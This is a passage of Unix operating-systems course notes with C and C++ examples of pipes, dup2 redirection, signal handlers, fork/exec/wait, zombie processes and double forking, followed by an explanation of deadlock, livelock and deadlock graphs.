  while (waitpid(-1, &status, WNOHANG) > 0)
    ;  /* reap every dead child without blocking */
}

int main()
{
  signal(SIGCHLD, zombiekiller);
  /* ... fork children as usual; none of them will become zombies ... */
  return 0;
}


Note: this topic does not really fit with the other lessons of the week, but you will need it for the exercise.
A second form of redirection is a pipe. A pipe is a connection between two processes in which one process writes data to the pipe and the other reads from the pipe. Thus, it allows one process to pass data to another process.
The Unix system call to create a pipe is
int pipe(int fd[2])
This function takes an array of two ints (file descriptors) as an argument. It creates a pipe with fd[0] as the read end and fd[1] as the write end. Reading from the pipe and writing to the pipe are done with the read and write calls that you have seen and used before. By convention, a process writes to fd[1] and reads from fd[0]. Pipes only make sense if the process calls fork after creating the pipe. Each process should close the end of the pipe that it is not using. Here is a simple example in which a child sends a message to its parent through a pipe.

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>

int main()
{
  pid_t pid;
  int retval;
  int fd[2];
  int n;

  retval = pipe(fd);
  if (retval < 0) {
    printf("Pipe failed\n"); /* pipe is unlikely to fail */
    return 1;
  }
  pid = fork();
  if (pid == 0) { /* child */
    close(fd[0]); /* the child only writes */
    n = write(fd[1],"Hello from the child",21); /* 21 includes the '\0' */
  }
  else if (pid > 0) { /* parent */
    char buffer[64];
    close(fd[1]); /* the parent only reads */
    n = read(fd[0],buffer,64);
    printf("I got your message: %s\n",buffer);
  }
  return 0;
}
There is no need for the parent to wait for the child to finish because reading from a pipe will block until there is something in the pipe to read. If the parent runs first, it will try to execute the read statement, and will immediately block because there is nothing in the pipe. After the child writes a message to the pipe, the parent will wake up. Pipes have a fixed size (often 4096 bytes) and if a process tries to write to a pipe which is full, the write will block until a process reads some data from the pipe.
Here is a program which combines dup2 and pipe to redirect the output of the ls process to the input of the more process as would be the case if the user typed
ls | more
at the Unix command line.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void error(char *msg)
{
    perror(msg);
    exit(1);
}

int main()
{
    int p[2], retval;

    retval = pipe(p);
    if (retval < 0) error("pipe");
    retval = fork();
    if (retval < 0) error("forking");
    if (retval==0) { /* child */
          dup2(p[1],1); /* redirect stdout to pipe */
          close(p[0]);  /* don't permit this 
                process to read from pipe */
          close(p[1]);  /* stdout already points at the pipe */
          execlp("ls","ls",(char *)0);
          error("Exec of ls");
    }
    /* if we get here, we are the parent */ 
     dup2(p[0],0);  /* redirect stdin to pipe */
     close(p[1]);  /* don't permit this 
                   process to write to pipe */
     close(p[0]);  /* stdin already points at the pipe */
     execlp("more","more",(char *)0);
     error("Exec of more");
     return 0;
}

There is a variant of deadlock called livelock. This is a situation in which two or more processes continuously change their state in response to changes in the other process(es) without doing any useful work. This is similar to deadlock in that no progress is made but differs in that neither process is blocked or waiting for anything.
A human example of livelock would be two people who meet face-to-face in a corridor and each moves aside to let the other pass, but they end up swaying from side to side without making any progress because they always move the same way at the same time.
Addressing deadlock in real systems
Deadlock is a terrific theoretical problem for graduate students, but none of the solutions discussed above can be implemented in a real world, general purpose operating system. It would be difficult to require a user program to make requests for resources in a certain way or in a certain order. As a result, most operating systems use the ostrich algorithm.
Some specialized systems have deadlock avoidance/prevention mechanisms. For example, many database operations involve locking several records, and this can result in deadlock, so database software often has a deadlock prevention algorithm.
The Unix file locking system lockf has a deadlock detection mechanism built into it. Whenever a process attempts to lock a file or a record of a file, the operating system checks to see if that process has locked other files or records, and if it has, it uses a graph algorithm similar to the one discussed above to see if granting that request will cause deadlock, and if it does, the request for the lock will fail, and the lockf system call will return and errno will be set to EDEADLK.


Recall that an interrupt is an asynchronous event which can happen at any time. When an interrupt occurs, the processor stops executing instructions in the current running process and executes an interrupt handler function in the kernel. Unix systems have a software interrupt mechanism called signals.
An example of a signal that you are probably familiar with is an interrupt signal which is sent by the user to a running process when the user enters Control-C. The default action of this signal is to kill the process.
A signal is represented as an integer. These integers are assigned symbolic names in the header file signal.h. The interrupt signal has the value 2 but you should use the symbolic name SIGINT.
Every signal has a default action. The default action for SIGINT is to abort the program. A program can modify the default action for most signals or they can choose to ignore a signal.
The system call which does this has the following function prototype.
void (*signal (int sig, void (*disp)(int)))(int);
This says that the function signal takes two arguments: the first, sig, is a signal number, and the second is the name of a handler function. The handler takes one argument, an integer, and returns nothing; signal itself returns a pointer to the previous handler. The call to signal changes the signal-handling function for its first argument from the default to the function given as its second argument.
Here is a simple example.

#include <signal.h>
#include <stdio.h>
#include <unistd.h>

void SigCatcher(int n)
{
    printf("Ha Ha, you can't kill me\n");
    signal(SIGINT, SigCatcher); /* re-install: some systems reset the handler */
}

int main()
{
    int i;

    signal(SIGINT, SigCatcher);
    for (i = 0; i < 10; i++) {
        sleep(1);
        printf("Just woke up, i is %d\n", i);
    }
    return 0;
}

The main function calls signal to change the default action to the function SigCatcher, then enters a loop where it alternately sleeps for one second and displays a message on stdout. Normally, the user could kill this program by hitting Control-C while it was running, but because the default signal action has been changed, when the user hits Control-C while this program is running, instead of the program dying, it displays the message
Ha Ha, you can't kill me
Try it. Notice that the signal handler function calls signal. On some Unix systems, once a signal handler has been called, the system resets the handler to the default unless it is reset again.
Here is a list of the predefined signals on Solaris (there are some slight differences from one Unix system to another).
#define SIGHUP 1      /* hangup */
#define SIGINT 2      /* interrupt (rubout) */
#define SIGQUIT 3     /* quit (ASCII FS) */
#define SIGILL 4      /* illegal instruction (not reset when caught) */
#define SIGTRAP 5     /* trace trap (not reset when caught) */
#define SIGIOT 6      /* IOT instruction */
#define SIGABRT 6     /* used by abort, replace SIGIOT in the future */
#define SIGEMT 7      /* EMT instruction */
#define SIGFPE 8      /* floating point exception */
#define SIGKILL 9     /* kill (cannot be caught or ignored) */
#define SIGBUS 10     /* bus error */
#define SIGSEGV 11    /* segmentation violation */
#define SIGSYS 12     /* bad argument to system call */
#define SIGPIPE 13    /* write on a pipe with no one to read it */
#define SIGALRM 14    /* alarm clock */
#define SIGTERM 15    /* software termination signal from kill */
#define SIGUSR1 16    /* user defined signal 1 */
#define SIGUSR2 17    /* user defined signal 2 */
#define SIGCLD 18     /* child status change */
#define SIGCHLD 18    /* child status change alias (POSIX) */
#define SIGPWR 19     /* power-fail restart */
#define SIGWINCH 20   /* window size change */
#define SIGURG 21     /* urgent socket condition */
#define SIGPOLL 22    /* pollable event occurred */
#define SIGIO SIGPOLL /* socket I/O possible (SIGPOLL alias) */
#define SIGSTOP 23    /* stop (cannot be caught or ignored) */
#define SIGTSTP 24    /* user stop requested from tty */
#define SIGCONT 25    /* stopped process has been continued */
#define SIGTTIN 26    /* background tty read attempted */
#define SIGTTOU 27    /* background tty write attempted */
#define SIGVTALRM 28  /* virtual timer expired */
#define SIGPROF 29    /* profiling timer expired */
#define SIGXCPU 30    /* exceeded cpu limit */
#define SIGXFSZ 31    /* exceeded file size limit */
#define SIGWAITING 32 /* process's lwps are blocked */
#define SIGLWP 33     /* special signal used by thread library */
#define SIGFREEZE 34  /* special signal used by CPR */
#define SIGTHAW 35    /* special signal used by CPR */
#define SIGCANCEL 36  /* thread cancellation signal used by libthread */
#define SIGLOST 37    /* resource lost (eg, record-lock lost) */

Signal 11, SIGSEGV, is the signal that is received when the program detects a segmentation fault (memory exception error). The default action for this is to display the message
Segmentation Fault (core dumped)
dump the core, and terminate the program. You can change the action for this so that it displays a different message, but of course you cannot try to continue to run the program.
Signal 9, SIGKILL, is the kill signal. A program is not allowed to change the signal handler for this signal. Otherwise, it would be possible for a program to change all of its signal handlers so that no one could kill a rogue program. To send a kill signal from the shell to a particular process, enter
kill -9 ProcessNumber

Signal 14 SIGALRM sends an alarm to a process. The default SIGALRM handler is to abort the program, but this can be changed. The system call
unsigned int alarm(unsigned int sec);
sends a SIGALRM signal to the process after sec seconds. If you have changed the signal handler function for this, then you can arrange for an event to happen after a set period of time.
You can choose to ignore any signal (except SIGKILL) by using SIG_IGN as the second argument of signal. You can also reset the signal handler for a particular signal to its default by using SIG_DFL as the second argument to signal.

Fork and Exec

The fork system call in Unix creates a new process. The new process inherits various properties from its parent (Environmental variables, File descriptors, etc - see the manual page for details). After a successful fork call, two copies of the original code will be running. In the original process (the parent) the return value of fork will be the process ID of the child. In the new child process the return value of fork will be 0. Here's a simple example where the child sleeps for 2 seconds while the parent waits for the child process to exit. Note how the return value of fork is used to control which code is run by the parent and which by the child.
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <iostream>
using namespace std;
int main(){
  pid_t pid;
  int status, died;
  switch (pid = fork()) {
     case -1: cout << "can't fork\n";
              exit(-1);
     case 0 : sleep(2); // this is the code the child runs
              exit(0);
     default: died = wait(&status); // this is the code the parent runs
  }
  return 0;
}
In the following annotated example the parent process queries the child process in more detail, determining whether the child exited normally or not. To make things interesting the parent kills the child process if the latter's PID is odd, so if you run the program a few times expect behaviour to vary.
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <signal.h>
#include <iostream>
using namespace std;

int main(){
   pid_t pid;
   int status, died;
   switch (pid = fork()) {
   case -1: cout << "can't fork\n";
            exit(-1);
   case 0 : cout << "   I'm the child of PID " << getppid() << ".\n";
            cout << "   My PID is " <<  getpid() << endl;
            sleep(2);
            exit(3);
   default: cout << "I'm the parent.\n";
            cout << "My PID is " <<  getpid() << endl;
            // kill the child in 50% of runs
            if (pid & 1)
               kill(pid, SIGKILL);
            died = wait(&status);
            if (WIFEXITED(status))
               cout << "The child, pid=" << pid << ", has returned " 
                    << WEXITSTATUS(status) << endl;
            else
               cout << "The child process was sent a " 
                    << WTERMSIG(status) << " signal\n";
   }
   return 0;
}
In the examples above, the new process is running the same program as the parent (though it's running different parts of it). Often however, you want the new process to run a new program. When, for example, you type "date" on the unix command line, the command line interpreter (the so-called "shell") forks so that momentarily 2 shells are running, then the code in the child process is replaced by the code of the "date" program by using one of the family of exec system calls. Here's a simple example of how it's done.
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <iostream>
using namespace std;

int main(){
   pid_t pid;
   int status, died;
   switch (pid = fork()) {
   case -1: cout << "can't fork\n";
            exit(-1);
   case 0 : execl("/usr/bin/date","date",(char *)0); // this is the code the child runs
            exit(-1); // only reached if execl fails
   default: died = wait(&status); // this is the code the parent runs
   }
   return 0;
}
The child process can communicate some information to its parent via the argument to exit, but this is rather restrictive. Richer communication is possible if one takes advantage of the fact that the child and parent share file descriptors. The popen() command is the tidiest way to do this. The following code uses a more low-level method. The pipe() command creates a pipe, returning two file descriptors; the 1st opened for reading from the pipe and the 2nd opened for writing to it. Both the parent and child process initially have access to both ends of the pipe. The code below closes the ends it doesn't need.
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <iostream>
#include <sys/types.h>
using namespace std;
int main(){
 char str[1024];
 int pipefd[2];
 pid_t pid;
 int status, died;

 pipe (pipefd);
 switch (pid = fork()) {
   case -1: cout << "can't fork\n";
            exit(-1);
   case 0 : // this is the code the child runs 
            close(1);      // close stdout
            // pipefd[1] is for writing to the pipe. We want the output
            // that used to go to the standard output (file descriptor 1)
            // to be written to the pipe. The following command does this,
            // creating a new file descriptor 1 (the lowest available) 
            // that writes where pipefd[1] goes.
            dup (pipefd[1]); // stdout now points at the pipe
            // the child isn't going to read from the pipe, so
            // pipefd[0] can be closed
            close (pipefd[0]);
            execl ("/usr/bin/date","date",(char *)0);
            exit(-1); // only reached if execl fails
   default: // this is the code the parent runs 

            close(0); // close stdin
            // Set file descriptor 0 (stdin) to read from the pipe
            dup (pipefd[0]);
            // the parent isn't going to write to the pipe
            close (pipefd[1]);
            // Now read from the pipe
            cin.getline(str, 1023);
            cout << "The date is " << str << endl;
            died= wait(&status);
 }
 return 0;
}
In all these examples the parent process waits for the child to exit. If the parent doesn't wait, but exits before the child process does, then the child is adopted by another process (usually the one with PID 1). After the child exits (but before it's waited for) it becomes a "zombie". If it's never waited for (because the parent process is hung, for example) it remains a zombie. In more recent Unix versions, the kernel releases these processes, but sometimes they can only be removed from the list of processes by rebooting the machine. Though in small numbers they're harmless enough, avoiding them is a very good idea. Particularly if a process has many children, it's worth using waitpid() rather than wait(), so that the code waits for the right process. Some versions of Unix have wait2(), wait3() and wait4() variants which may be useful.

Double fork

One way to create a new process that is more isolated from the parent is to do a double fork: the parent forks a child, the child immediately forks a grandchild and exits, and the parent reaps the child. The orphaned grandchild is adopted (and will eventually be reaped) by init.
The original process doesn't have to wait around for the new process to die, and doesn't need to worry when it does.


Recall that one definition of an operating system is a resource allocator. There are many resources that can be allocated to only one process at a time, and we have seen several operating system features that allow this, such as mutexes, semaphores or file locks.
Sometimes a process has to reserve more than one resource. For example, a process which copies files from one tape to another generally requires two tape drives. A process which deals with databases may need to lock multiple records in a database.
In general, resources allocated to a process are not preemptable; this means that once a resource has been allocated to a process, there is no simple mechanism by which the system can take the resource back from the process unless the process voluntarily gives it up or the system administrator kills the process. This can lead to a situation called deadlock. A set of processes or threads is deadlocked when each process or thread is waiting for a resource to be freed which is controlled by another process. Here is an example of a situation where deadlock can occur.
Mutex M1, M2;

/* Thread 1 */
while (1) {
    lock(&M1);
    lock(&M2);
    /* use the resources guarded by M1 and M2 */
    unlock(&M2);
    unlock(&M1);
}

/* Thread 2 */
while (1) {
    lock(&M2);
    lock(&M1);
    /* use the resources guarded by M1 and M2 */
    unlock(&M1);
    unlock(&M2);
}
Suppose thread 1 is running and locks M1, but before it can lock M2, it is interrupted. Thread 2 starts running; it locks M2, when it tries to obtain and lock M1, it is blocked because M1 is already locked (by thread 1). Eventually thread 1 starts running again, and it tries to obtain and lock M2, but it is blocked because M2 is already locked by thread 2. Both threads are blocked; each is waiting for an event which will never occur. Traffic gridlock is an everyday example of a deadlock situation.

In order for deadlock to occur, four conditions must be true.
  • Mutual exclusion - Each resource is either currently allocated to exactly one process or it is available. (Two processes cannot simultaneously control the same resource or be in their critical section).
  • Hold and Wait - processes currently holding resources can request new resources
  • No preemption - Once a process holds a resource, it cannot be taken away by another process or the kernel.
  • Circular wait - Each process is waiting to obtain a resource which is held by another process.
The dining philosophers problem discussed in an earlier section is a classic example of deadlock. Each philosopher picks up his or her left fork and waits for the right fork to become available, but it never does.
Deadlock can be modeled with a directed graph. In a deadlock graph, vertices represent either processes (circles) or resources (squares). A process which has acquired a resource is shown with an arrow (edge) from the resource to the process. A process which has requested a resource which has not yet been assigned to it is modeled with an arrow from the process to the resource. If these create a cycle, there is deadlock.
The deadlock situation in the above code can be modeled like this.

This graph shows an extremely simple deadlock situation, but it is also possible for a more complex situation to create deadlock. Here is an example of deadlock with four processes and four resources.

There are a number of ways that deadlock can occur in an operating system. We have seen some examples; here are two more.
  • Two processes need to lock two files, the first process locks one file the second process locks the other, and each waits for the other to free up the locked file.
  • Two processes want to write a file to a print spool area at the same time and both start writing. However, the print spool area is of fixed size, and it fills up before either process finishes writing its file, so both wait for more space to become available.